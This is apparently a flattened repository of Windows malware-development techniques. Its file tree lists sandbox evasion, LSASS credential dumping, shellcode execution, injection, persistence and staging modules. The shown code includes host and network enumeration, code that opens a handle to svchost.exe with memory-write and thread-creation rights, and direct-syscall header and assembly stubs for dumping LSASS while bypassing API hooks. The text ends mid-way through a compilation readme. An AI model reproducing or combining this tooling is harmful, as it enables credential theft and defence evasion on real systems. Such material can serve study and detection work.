├── Enumeration ├── Network │ ├── Get_IP_Address.c │ ├── Get_IP_Address_File_Creation.cpp │ ├── Get_MAC_Address.c │ ├── Get_Network_Connections.c │ └── Get_Open_Ports.c ├── Processes │ ├── CreateToolhelp32Snapshot.cpp │ ├── GetProcessFromArgv.c │ └── NtGetNextProcess.cpp └── User Environment │ ├── GetENV.c │ ├── Get_CWD.c │ └── Get_Username_Domain_Privileges.c ├── Evasion Techniques ├── LsassDump │ └── LsassDumpSyscall │ │ ├── LsassDump.cpp │ │ ├── Lsasssyscall.h │ │ ├── lsasssyscall.asm │ │ └── readme.md ├── Sandbox Evasion │ ├── UTC_time_zone.c │ ├── check_all_DLL_names.c │ ├── check_all_process_names.c │ ├── detect_debugging.c │ ├── filepath_existence.c │ ├── hostname.c │ ├── mac_address.c │ ├── minimum_num_running_processes.c │ ├── prevent_debugging.c │ ├── processors.c │ ├── processorsCount.cpp │ ├── ram.c │ ├── registry.c │ ├── usb.c │ └── username.c ├── Shellcode Encryption and Decryption │ ├── MSF_Xor_Encrypt.sh │ ├── Xor_Decrypt.c │ └── Xor_Encrypt.c ├── SysCall Examples │ ├── Direct Syscalls │ │ ├── DirectSyscalls.cpp │ │ ├── NtOpenProcess.cpp │ │ └── getSyscall.h │ └── LoadLibraryA Syscalls │ │ ├── NtCreateThreadEx │ │ └── NtCreateThreadEx.cpp │ │ ├── ZWALLOCATEVIRTUALMEMORY │ │ └── ZWALLOCATEVIRTUALMEMORY.cpp │ │ └── ZWWRITEVIRTUALMEMORY │ │ └── ZWWRITEVIRTUALMEMORY.cpp ├── Unhooking │ └── Unhook_ntdll.cpp └── WinAPI Hashing │ ├── VirtualAlloc_Example.c │ └── myhash.py ├── Misc Techniques └── Execute_cmd.c ├── Persistence ├── admin_persistence_accessibility_features.c ├── admin_persistence_appinit_dlls.c ├── admin_persistence_winlogon.c ├── screensaver_hijacking.c └── user_persistence_run.c ├── README.md ├── Shellcode Execution ├── CertEnumSystemStore │ ├── CertEnumSystemStore.cpp │ ├── CertEnumSystemStore.vcxproj │ └── CertEnumSystemStore.vcxproj.filters ├── CertEnumSystemStoreLocation │ ├── CertEnumSystemStoreLocation.cpp │ ├── CertEnumSystemStoreLocation.vcxproj │ └── CertEnumSystemStoreLocation.vcxproj.filters ├── CopyFile2 │ ├── CopyFile2.cpp │ ├── CopyFile2.vcxproj │ └── CopyFile2.vcxproj.filters ├── CopyFileEx │ ├── CopyFileEx.cpp │ ├── CopyFileEx.vcxproj │ └── CopyFileEx.vcxproj.filters ├── CreateThreadPoolWait │ ├── CreateThreadPoolWait.cpp │ ├── CreateThreadPoolWait.vcxproj │ └── CreateThreadPoolWait.vcxproj.filters ├── CreateTimerQueueTimer_Tech │ ├── CreateTimerQueueTimer_Tech.cpp │ ├── CreateTimerQueueTimer_Tech.vcxproj │ └── CreateTimerQueueTimer_Tech.vcxproj.filters ├── CryptEnumOIDInfo │ ├── CryptEnumOIDInfo.cpp │ ├── CryptEnumOIDInfo.vcxproj │ └── CryptEnumOIDInfo.vcxproj.filters ├── EnumCalendarInfo │ ├── EnumCalendarInfo.cpp │ └── EnumCalendarInfo.vcxproj ├── EnumCalendarInfoEx │ ├── EnumCalendarInfoEx.cpp │ └── EnumCalendarInfoEx.vcxproj ├── EnumChildWindows │ ├── EnumChildWindows.cpp │ ├── EnumChildWindows.vcxproj │ └── EnumChildWindows.vcxproj.filters ├── EnumDesktopW │ ├── EnumDesktopW.cpp │ ├── EnumDesktopW.vcxproj │ └── EnumDesktopW.vcxproj.filters ├── EnumDesktopWindows │ ├── EnumDesktopWindows.cpp │ ├── EnumDesktopWindows.vcxproj │ └── EnumDesktopWindows.vcxproj.filters ├── EnumDirTreeW │ ├── EnumDirTreeW.cpp │ ├── EnumDirTreeW.vcxproj │ └── EnumDirTreeW.vcxproj.filters ├── EnumDisplayMonitors │ ├── EnumDisplayMonitors.cpp │ ├── EnumDisplayMonitors.vcxproj │ └── EnumDisplayMonitors.vcxproj.filters ├── EnumFontFamiliesExW │ ├── EnumFontFamiliesExW.cpp │ ├── EnumFontFamiliesExW.vcxproj │ └── EnumFontFamiliesExW.vcxproj.filters ├── EnumFontFamiliesW │ ├── EnumFontFamiliesW.cpp │ ├── EnumFontFamiliesW.vcxproj │ └── EnumFontFamiliesW.vcxproj.filters ├── EnumFontsW │ ├── EnumFontsW.cpp │ ├── EnumFontsW.vcxproj │ └── EnumFontsW.vcxproj.filters ├── EnumICMProfiles │ ├── EnumICMProfiles.cpp │ ├── EnumICMProfiles.vcxproj │ └── EnumICMProfiles.vcxproj.filters ├── EnumLanguageGroupLocalesW │ ├── EnumLanguageGroupLocalesW.cpp │ ├── EnumLanguageGroupLocalesW.vcxproj │ └── EnumLanguageGroupLocalesW.vcxproj.filters ├── EnumObjects │ ├── EnumObjects.cpp │ ├── EnumObjects.vcxproj │ └── EnumObjects.vcxproj.filters ├── EnumPageFilesW │ ├── EnumPageFilesW.cpp │ ├── EnumPageFilesW.vcxproj │ └── EnumPageFilesW.vcxproj.filters ├── EnumPropsEx │ ├── EnumPropsEx.cpp │ ├── EnumPropsEx.vcxproj │ └── EnumPropsEx.vcxproj.filters ├── EnumPropsW │ ├── EnumPropsW.cpp │ ├── EnumPropsW.vcxproj │ └── EnumPropsW.vcxproj.filters ├── EnumPwrSchemes │ ├── EnumPwrSchemes.cpp │ ├── EnumPwrSchemes.vcxproj │ └── EnumPwrSchemes.vcxproj.filters ├── EnumResourceTypesExW │ ├── EnumResourceTypesExW.cpp │ ├── EnumResourceTypesExW.vcxproj │ └── EnumResourceTypesExW.vcxproj.filters ├── EnumResourceTypesW │ ├── EnumResourceTypesW.cpp │ ├── EnumResourceTypesW.vcxproj │ └── EnumResourceTypesW.vcxproj.filters ├── EnumSystemLocales │ ├── EnumSystemLocales.cpp │ ├── EnumSystemLocales.vcxproj │ └── EnumSystemLocales.vcxproj.filters ├── EnumThreadWindows │ ├── EnumThreadWindows.cpp │ ├── EnumThreadWindows.vcxproj │ └── EnumThreadWindows.vcxproj.filters ├── EnumTimeFormatsEx │ ├── EnumTimeFormatsEx.cpp │ ├── EnumTimeFormatsEx.vcxproj │ └── EnumTimeFormatsEx.vcxproj.filters ├── EnumUILanguagesW │ ├── EnumUILanguagesW.cpp │ ├── EnumUILanguagesW.vcxproj │ └── EnumUILanguagesW.vcxproj.filters ├── EnumWindowStationsW │ ├── EnumWindowStationsW.cpp │ ├── EnumWindowStationsW.vcxproj │ └── EnumWindowStationsW.vcxproj.filters ├── EnumWindows │ ├── EnumWindows.cpp │ ├── EnumWindows.vcxproj │ └── EnumWindows.vcxproj.filters ├── EnumerateLoadedModules │ ├── EnumerateLoadedModules.cpp │ ├── EnumerateLoadedModules.vcxproj │ └── EnumerateLoadedModules.vcxproj.filters ├── FiberContextEdit │ ├── FiberContextEdit.vcxproj │ ├── FiberContextEdit.vcxproj.filters │ └── Source.cpp ├── FileMap │ └── directPointerToFileMap.cpp ├── FlsAlloc │ ├── FlsAlloc.cpp │ ├── FlsAlloc.vcxproj │ └── FlsAlloc.vcxproj.filters ├── ImageGetDigestStream │ ├── ImageGetDigestStream.cpp │ ├── ImageGetDigestStream.vcxproj │ └── ImageGetDigestStream.vcxproj.filters ├── ImmEnumInputContext │ ├── ImmEnumInputContext.cpp │ ├── ImmEnumInputContext.vcxproj │ └── ImmEnumInputContext.vcxproj.filters ├── InitOnceExecuteOnce │ ├── InitOnceExecuteOnce.cpp │ ├── InitOnceExecuteOnce.vcxproj │ └── InitOnceExecuteOnce.vcxproj.filters ├── Injection Techniques │ ├── Process_Injection.c │ └── Thread_Injection.c ├── LdrEnumerateLoadedModules │ ├── LdrEnumerateLoadedModules.cpp │ ├── LdrEnumerateLoadedModules.vcxproj │ └── LdrEnumerateLoadedModules.vcxproj.filters ├── LdrpCallInitRoutine │ ├── LdrpCallInitRoutine.vcxproj │ ├── LdrpCallInitRoutine.vcxproj.filters │ └── Source.cpp ├── OpenThreadWaitChainSession │ ├── CreateTimerQueueTimer.cpp │ ├── OpenThreadWaitChainSession.vcxproj │ └── OpenThreadWaitChainSession.vcxproj.filters ├── RtlUserFiberStart │ ├── RtlUserFiberStart.vcxproj │ ├── RtlUserFiberStart.vcxproj.filters │ └── Source.cpp ├── SetTimer │ ├── SetTimer.cpp │ ├── SetTimer.vcxproj │ └── SetTimer.vcxproj.filters ├── SetupCommitFileQueueW │ ├── SetupCommitFileQueueW.cpp │ ├── SetupCommitFileQueueW.vcxproj │ └── SetupCommitFileQueueW.vcxproj.filters ├── SymEnumProcesses │ ├── SymEnumProcesses.cpp │ ├── SymEnumProcesses.vcxproj │ └── SymEnumProcesses.vcxproj.filters ├── SymFindFileInPath │ ├── SymFindFileInPath.cpp │ ├── SymFindFileInPath.vcxproj │ └── SymFindFileInPath.vcxproj.filters ├── SysEnumSourceFiles │ ├── SysEnumSourceFiles.cpp │ ├── SysEnumSourceFiles.vcxproj │ └── SysEnumSourceFiles.vcxproj.filters └── VerifierEnumerateResource │ ├── VerifierEnumerateResource.cpp │ ├── VerifierEnumerateResource.vcxproj │ └── VerifierEnumerateResource.vcxproj.filters └── Staging Techniques ├── ADS_Stage.c ├── HTTP_Stage.cpp ├── Local_Stage.c ├── SMB_Stage.c └── Sockets_Staging.cpp /Enumeration/Network/Get_IP_Address.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "ws2_32.lib") // Link with Winsock library 6 | 7 | // Function to get the IP address 8 | char* getIPAddress() { 9 | WSADATA wsaData; 10 | static char ipstr[INET_ADDRSTRLEN]; // Static to ensure it persists after the function exits 11 | char hostname[256]; 12 | struct addrinfo hints, * res, * p; 13 | 14 | // Initialize Winsock 15 | if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) { 16 | return NULL; 17 | } 18 | 19 | // Get the hostname of the machine 20 | if (gethostname(hostname, sizeof(hostname)) != 0) { 21 | WSACleanup(); 22 | return NULL; 23 | } 24 | 25 | // Set up hints for getaddrinfo 26 | ZeroMemory(&hints, sizeof(hints)); 27 | hints.ai_family = AF_INET; // IPv4 28 | hints.ai_socktype = SOCK_STREAM; 29 | hints.ai_protocol = IPPROTO_TCP; 30 | 31 | // Get address information 32 | if (getaddrinfo(hostname, NULL, &hints, &res) != 0) { 33 | WSACleanup(); 34 | return NULL; 35 | } 36 | 37 | // Loop through the results and get the first IPv4 address 38 | for (p = res; p != NULL; p = p->ai_next) { 39 | struct sockaddr_in* addr = (struct sockaddr_in*)p->ai_addr; 40 | inet_ntop(AF_INET, &addr->sin_addr, ipstr, sizeof(ipstr)); 41 | break; // Stop after the first address 42 | } 43 | 44 | // Free the address information and cleanup 45 | freeaddrinfo(res); 46 | WSACleanup(); 47 | 48 | return ipstr; 49 | } 50 | 51 | int main() { 52 | char* ipAddress = getIPAddress(); 53 | if (ipAddress) { 54 | printf("%s\n", ipAddress); 55 | } 56 | else { 57 | printf("Failed to retrieve IP address.\n"); 58 | } 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /Enumeration/Network/Get_IP_Address_File_Creation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | int main() 8 | { 9 | string* s = new string [10]; 10 | string line; 11 | ifstream IPFile; 12 | int offset; 13 | char* search0 = "IPv4 Address. . . . . . . . . . . :"; // search pattern 14 | 15 | system("ipconfig > ip.txt"); 16 | 17 | IPFile.open ("ip.txt"); 18 | 19 | int i = 0; 20 | if(IPFile.is_open()) 21 | { 22 | while(!IPFile.eof()) 23 | { 24 | getline(IPFile,line); 25 | if ((offset = line.find(search0, 0)) != string::npos) 26 | { 27 | line.erase(0,39); 28 | s[i] = line; 29 | i++; 30 | } 31 | } 32 | } 33 | IPFile.close(); 34 | for(int j = 0; j 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "ws2_32.lib") // Link with Winsock library 7 | #pragma comment(lib, "iphlpapi.lib") // Link with IP Helper API library 8 | 9 | 10 | // Function to get the MAC address 11 | char* getMACAddress() { 12 | static char macstr[18]; // Static to ensure it persists after the function exits 13 | PIP_ADAPTER_INFO adapterInfo; 14 | PIP_ADAPTER_INFO adapter; 15 | DWORD bufferSize = sizeof(IP_ADAPTER_INFO); 16 | adapterInfo = (IP_ADAPTER_INFO*)malloc(bufferSize); 17 | 18 | // Get the adapter info 19 | if (GetAdaptersInfo(adapterInfo, &bufferSize) == ERROR_BUFFER_OVERFLOW) { 20 | free(adapterInfo); 21 | adapterInfo = (IP_ADAPTER_INFO*)malloc(bufferSize); 22 | } 23 | 24 | if (GetAdaptersInfo(adapterInfo, &bufferSize) == NO_ERROR) { 25 | // Loop through adapters and get the first MAC address 26 | for (adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) { 27 | snprintf(macstr, sizeof(macstr), "%02X:%02X:%02X:%02X:%02X:%02X", 28 | adapter->Address[0], adapter->Address[1], adapter->Address[2], 29 | adapter->Address[3], adapter->Address[4], adapter->Address[5]); 30 | break; // Stop after the first adapter 31 | } 32 | } 33 | else { 34 | free(adapterInfo); 35 | return NULL; 36 | } 37 | 38 | free(adapterInfo); 39 | return macstr; 40 | } 41 | 42 | int main() { 43 | 44 | char* macAddress = getMACAddress(); 45 | 46 | if (macAddress) { 47 | printf("MAC Address: %s\n", macAddress); 48 | } 49 | else { 50 | printf("Failed to retrieve MAC address.\n"); 51 | } 52 | 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /Enumeration/Network/Get_Network_Connections.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "iphlpapi.lib") 8 | #pragma comment(lib, "ws2_32.lib") 9 | 10 | // Define INET_ADDRSTRLEN if it's not already defined 11 | #ifndef INET_ADDRSTRLEN 12 | #define INET_ADDRSTRLEN 22 13 | #endif 14 | 15 | void displayNetworkConnections() { 16 | PMIB_TCPTABLE_OWNER_PID tcpTable = NULL; 17 | PMIB_UDPTABLE_OWNER_PID udpTable = NULL; 18 | DWORD tcpTableSize = 0, udpTableSize = 0; 19 | DWORD result; 20 | 21 | // Retrieve TCP table size 22 | result = GetExtendedTcpTable(NULL, &tcpTableSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 23 | tcpTable = (PMIB_TCPTABLE_OWNER_PID)malloc(tcpTableSize); 24 | 25 | if (tcpTable == NULL || GetExtendedTcpTable(tcpTable, &tcpTableSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0) != NO_ERROR) { 26 | printf("Failed to retrieve TCP table.\n"); 27 | free(tcpTable); 28 | return; 29 | } 30 | 31 | // Retrieve UDP table size 32 | result = GetExtendedUdpTable(NULL, &udpTableSize, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0); 33 | udpTable = (PMIB_UDPTABLE_OWNER_PID)malloc(udpTableSize); 34 | 35 | if (udpTable == NULL || GetExtendedUdpTable(udpTable, &udpTableSize, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0) != NO_ERROR) { 36 | printf("Failed to retrieve UDP table.\n"); 37 | free(tcpTable); 38 | free(udpTable); 39 | return; 40 | } 41 | 42 | printf("Active Network Connections (TCP):\n"); 43 | for (DWORD i = 0; i < tcpTable->dwNumEntries; i++) { 44 | char localAddr[INET_ADDRSTRLEN], remoteAddr[INET_ADDRSTRLEN]; 45 | struct in_addr local, remote; 46 | 47 | local.S_un.S_addr = tcpTable->table[i].dwLocalAddr; 48 | remote.S_un.S_addr = tcpTable->table[i].dwRemoteAddr; 49 | 50 | inet_ntop(AF_INET, &local, localAddr, sizeof(localAddr)); 51 | inet_ntop(AF_INET, &remote, remoteAddr, sizeof(remoteAddr)); 52 | 53 | printf("TCP: Local: %s:%d -> Remote: %s:%d | State: %ld\n", 54 | localAddr, ntohs((u_short)tcpTable->table[i].dwLocalPort), 55 | remoteAddr, ntohs((u_short)tcpTable->table[i].dwRemotePort), 56 | tcpTable->table[i].dwState); 57 | } 58 | 59 | printf("\nActive Network Connections (UDP):\n"); 60 | for (DWORD i = 0; i < udpTable->dwNumEntries; i++) { 61 | char localAddr[INET_ADDRSTRLEN]; 62 | struct in_addr local; 63 | 64 | local.S_un.S_addr = udpTable->table[i].dwLocalAddr; 65 | 66 | inet_ntop(AF_INET, &local, localAddr, sizeof(localAddr)); 67 | 68 | printf("UDP: Local: %s:%d\n", 69 | localAddr, ntohs((u_short)udpTable->table[i].dwLocalPort)); 70 | } 71 | 72 | free(tcpTable); 73 | free(udpTable); 74 | } 75 | 76 | int main() { 77 | displayNetworkConnections(); 78 | return 0; 79 | } 80 | -------------------------------------------------------------------------------- /Enumeration/Network/Get_Open_Ports.c: -------------------------------------------------------------------------------- 1 | #include // Include winsock2.h first to avoid conflicts 2 | #include // Include windows.h after winsock2.h 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "iphlpapi.lib") 8 | #pragma comment(lib, "ws2_32.lib") // Link Winsock library for ntohs 9 | 10 | // Function to retrieve all open TCP ports 11 | void getOpenPorts() { 12 | DWORD bufferSize = 0; 13 | PMIB_TCPTABLE_OWNER_PID tcpTable = NULL; 14 | DWORD result; 15 | 16 | // Determine the buffer size required for the TCP table 17 | result = GetExtendedTcpTable(NULL, &bufferSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 18 | if (result != ERROR_INSUFFICIENT_BUFFER) { 19 | printf("Failed to determine buffer size. Error: %lu\n", result); 20 | return; 21 | } 22 | 23 | tcpTable = (PMIB_TCPTABLE_OWNER_PID)malloc(bufferSize); 24 | if (tcpTable == NULL) { 25 | printf("Memory allocation failed.\n"); 26 | return; 27 | } 28 | 29 | // Retrieve the TCP table 30 | result = GetExtendedTcpTable(tcpTable, &bufferSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 31 | if (result != NO_ERROR) { 32 | printf("Failed to retrieve TCP table. Error: %lu\n", result); 33 | free(tcpTable); 34 | return; 35 | } 36 | 37 | // Loop through the table and display open ports 38 | printf("Open TCP Ports:\n"); 39 | for (DWORD i = 0; i < tcpTable->dwNumEntries; i++) { 40 | DWORD localPort = ntohs((u_short)tcpTable->table[i].dwLocalPort); 41 | DWORD state = tcpTable->table[i].dwState; 42 | 43 | // Display ports in LISTENING or ESTABLISHED state 44 | if (state == MIB_TCP_STATE_LISTEN || state == MIB_TCP_STATE_ESTAB) { 45 | printf("Port: %lu, State: %s\n", 46 | localPort, 47 | (state == MIB_TCP_STATE_LISTEN) ? "LISTENING" : "ESTABLISHED"); 48 | } 49 | } 50 | 51 | // Free the allocated memory 52 | free(tcpTable); 53 | } 54 | 55 | int main() { 56 | getOpenPorts(); 57 | return 0; 58 | } 59 | -------------------------------------------------------------------------------- /Enumeration/Processes/CreateToolhelp32Snapshot.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | int pid = 0; 8 | LPCTSTR processname = L"svchost.exe"; 9 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); 10 | if (hSnapshot == INVALID_HANDLE_VALUE) 11 | { 12 | return -1; 13 | } 14 | PROCESSENTRY32 pe; 15 | pe.dwSize = sizeof(pe); 16 | 17 | if (!Process32First(hSnapshot, &pe)) 18 | { 19 | -1; 20 | } 21 | 22 | HANDLE hProcess = NULL; 23 | do { 24 | if (0 == _wcsicmp(processname, pe.szExeFile)) 25 | { 26 | pid = pe.th32ProcessID; 27 | printf("[!] Trying to open handle on %ls, on pid %d\n", processname, pid); 28 | 29 | hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid); 30 | if (hProcess == NULL) 31 | { 32 | printf("[X] Could not open handle on %d, continuing\n", pid); 33 | } 34 | else 35 | { 36 | printf("[+] Successfully got handle on %d\n", pid); 37 | break; 38 | } 39 | } 40 | } while (Process32Next(hSnapshot, &pe)); 41 | 42 | CloseHandle(hSnapshot); 43 | } 44 | 45 | -------------------------------------------------------------------------------- /Enumeration/Processes/GetProcessFromArgv.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | DWORD GetProcessIdByName(IN const char* name, OUT HANDLE& hProcess) 8 | { 9 | PROCESSENTRY32 entry; 10 | entry.dwSize = sizeof(PROCESSENTRY32); 11 | char buf[MAX_PATH] = { 0 }; 12 | size_t charsConverted = 0; 13 | 14 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 15 | if (snapshot == INVALID_HANDLE_VALUE) 16 | { 17 | printf("[-] Could not create snapshot. Error: %lu\n", GetLastError()); 18 | return NULL; 19 | } 20 | 21 | if (Process32First(snapshot, &entry) == TRUE) 22 | { 23 | do 24 | { 25 | wcstombs_s(&charsConverted, buf, MAX_PATH, entry.szExeFile, MAX_PATH - 1); 26 | if (_stricmp(buf, name) == 0) 27 | { 28 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID); 29 | if (hProcess != NULL) 30 | { 31 | printf("[+] Got handle on %d\n", entry.th32ProcessID); 32 | CloseHandle(snapshot); // Always close handles you no longer need 33 | return entry.th32ProcessID; 34 | } 35 | printf("[-] Could not obtain handle on %d. Continuing!\n", entry.th32ProcessID); 36 | } 37 | } while (Process32Next(snapshot, &entry) == TRUE); 38 | } 39 | 40 | printf("[-] Process not found.\n"); 41 | CloseHandle(snapshot); 42 | return NULL; 43 | } 44 | 45 | int main(int argc, char* argv[]) 46 | { 47 | int pid = GetProcessIdByName(argv[1]); 48 | printf("%d\n", pid); 49 | } 50 | -------------------------------------------------------------------------------- /Enumeration/Processes/NtGetNextProcess.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Find process ID by NtGetNextProcess. C++ implementation 3 | * author: @cocomelonc 4 | * based on https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #pragma comment(lib, "ntdll.lib") 13 | #pragma comment(lib, "shlwapi.lib") 14 | 15 | typedef NTSTATUS (NTAPI * fNtGetNextProcess)( 16 | _In_ HANDLE ProcessHandle, 17 | _In_ ACCESS_MASK DesiredAccess, 18 | _In_ ULONG HandleAttributes, 19 | _In_ ULONG Flags, 20 | _Out_ PHANDLE NewProcessHandle 21 | ); 22 | 23 | int findMyProc(const char * procname) { 24 | int pid = 0; 25 | HANDLE current = NULL; 26 | char procName[MAX_PATH]; 27 | 28 | // resolve function address 29 | fNtGetNextProcess myNtGetNextProcess = (fNtGetNextProcess) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtGetNextProcess"); 30 | 31 | // loop through all processes 32 | while (!myNtGetNextProcess(current, MAXIMUM_ALLOWED, 0, 0, ¤t)) { 33 | GetProcessImageFileNameA(current, procName, MAX_PATH); 34 | if (lstrcmpiA(procname, PathFindFileName((LPCSTR) procName)) == 0) { 35 | pid = GetProcessId(current); 36 | break; 37 | } 38 | } 39 | 40 | return pid; 41 | } 42 | 43 | int main(int argc, char* argv[]) { 44 | int pid = 0; // process ID 45 | pid = findMyProc(argv[1]); 46 | printf("%s%d\n", pid > 0 ? "process found at pid = " : "process not found. pid = ", pid); 47 | return 0; 48 | } -------------------------------------------------------------------------------- /Enumeration/User Environment/GetENV.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main () { 4 | printf("UserName : %s\n", getenv("USERNAME")); 5 | printf("Path : %s\n", getenv("PATH")); 6 | printf("UserHome : %s\n", getenv("USERPROFILE")); 7 | 8 | return(0); 9 | } -------------------------------------------------------------------------------- /Enumeration/User Environment/Get_CWD.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void getCurrentWorkingDirectory() { 5 | TCHAR cwd[MAX_PATH]; 6 | if (GetCurrentDirectory(MAX_PATH, cwd)) { 7 | _tprintf(_T("Current Working Directory: %s\n"), cwd); 8 | } 9 | else { 10 | _ftprintf(stderr, _T("Error retrieving current working directory.\n")); 11 | } 12 | } 13 | 14 | int main() { 15 | getCurrentWorkingDirectory(); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/Lsasssyscall.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include // For original definitions of structures and types like CLIENT_ID 5 | 6 | // Remove any custom definitions of CLIENT_ID or related types 7 | 8 | // Prototypes for the functions with the correct signatures, assuming these signatures match those required by your syscalls 9 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, CLIENT_ID* ClientId); 10 | EXTERN_C NTSTATUS ZwClose10(HANDLE Handle); 11 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE ProcessHandle, PVOID BaseAddress, LPCVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesWritten); 12 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(HANDLE ProcessHandle, PVOID* BaseAddress, SIZE_T* NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 13 | EXTERN_C NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 14 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 15 | 16 | // Global function pointers for dynamic resolution, if needed 17 | // If using these, they should be resolved at runtime based on the system version 18 | typedef NTSTATUS(NTAPI* PFN_ZwOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, CLIENT_ID* ClientId); 19 | typedef NTSTATUS(NTAPI* PFN_ZwClose)(HANDLE Handle); 20 | typedef NTSTATUS(NTAPI* PFN_ZwWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, LPCVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesWritten); 21 | typedef NTSTATUS(NTAPI* PFN_ZwProtectVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, SIZE_T* NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 22 | typedef NTSTATUS(NTAPI* PFN_ZwQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 23 | typedef NTSTATUS(NTAPI* PFN_NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 24 | 25 | // Actual function pointer variables 26 | PFN_ZwOpenProcess g_ZwOpenProcess = nullptr; 27 | PFN_ZwClose g_ZwClose = nullptr; 28 | PFN_ZwWriteVirtualMemory g_ZwWriteVirtualMemory = nullptr; 29 | PFN_ZwProtectVirtualMemory g_ZwProtectVirtualMemory = nullptr; 30 | PFN_ZwQuerySystemInformation g_ZwQuerySystemInformation = nullptr; 31 | PFN_NtCreateFile g_NtCreateFile = nullptr; 32 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/lsasssyscall.asm: -------------------------------------------------------------------------------- 1 | .CODE 2 | ZwOpenProcess10 proc 3 | mov r10, rcx 4 | mov eax, 26h 5 | syscall 6 | ret 7 | ZwOpenProcess10 endp 8 | 9 | ZwClose10 proc 10 | mov r10, rcx 11 | mov eax, 0Fh 12 | syscall 13 | ret 14 | ZwClose10 endp 15 | 16 | ZwWriteVirtualMemory10 proc 17 | mov r10, rcx 18 | mov eax, 3Ah 19 | syscall 20 | ret 21 | ZwWriteVirtualMemory10 endp 22 | 23 | ZwProtectVirtualMemory10 proc 24 | mov r10, rcx 25 | mov eax, 50h 26 | syscall 27 | ret 28 | ZwProtectVirtualMemory10 endp 29 | 30 | ZwQuerySystemInformation10 proc 31 | mov r10, rcx 32 | mov eax, 36h 33 | syscall 34 | ret 35 | ZwQuerySystemInformation10 endp 36 | 37 | NtAllocateVirtualMemory10 proc 38 | mov r10, rcx 39 | mov eax, 18h 40 | syscall 41 | ret 42 | NtAllocateVirtualMemory10 endp 43 | 44 | NtFreeVirtualMemory10 proc 45 | mov r10, rcx 46 | mov eax, 1Eh 47 | syscall 48 | ret 49 | NtFreeVirtualMemory10 endp 50 | 51 | NtCreateFile10 proc 52 | mov r10, rcx 53 | mov eax, 55h 54 | syscall 55 | ret 56 | NtCreateFile10 endp 57 | 58 | end 59 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/readme.md: -------------------------------------------------------------------------------- 1 | ## **Step-by-Step Compilation Instructions** 2 | 3 | ### **1. Install Visual Studio** 4 | 1. Download and install the **Visual Studio IDE** (Community Edition is sufficient) from [Download](https://visualstudio.microsoft.com/). 5 | 2. During installation, ensure you select the following workloads: 6 | - **Desktop development with C++** 7 | - **MSVC v142 - VS 2019 C++ x64/x86 build tools** 8 | - **Windows 10 SDK** 9 | - **Windows 11 SDK** 10 | 11 | ### **2. Add 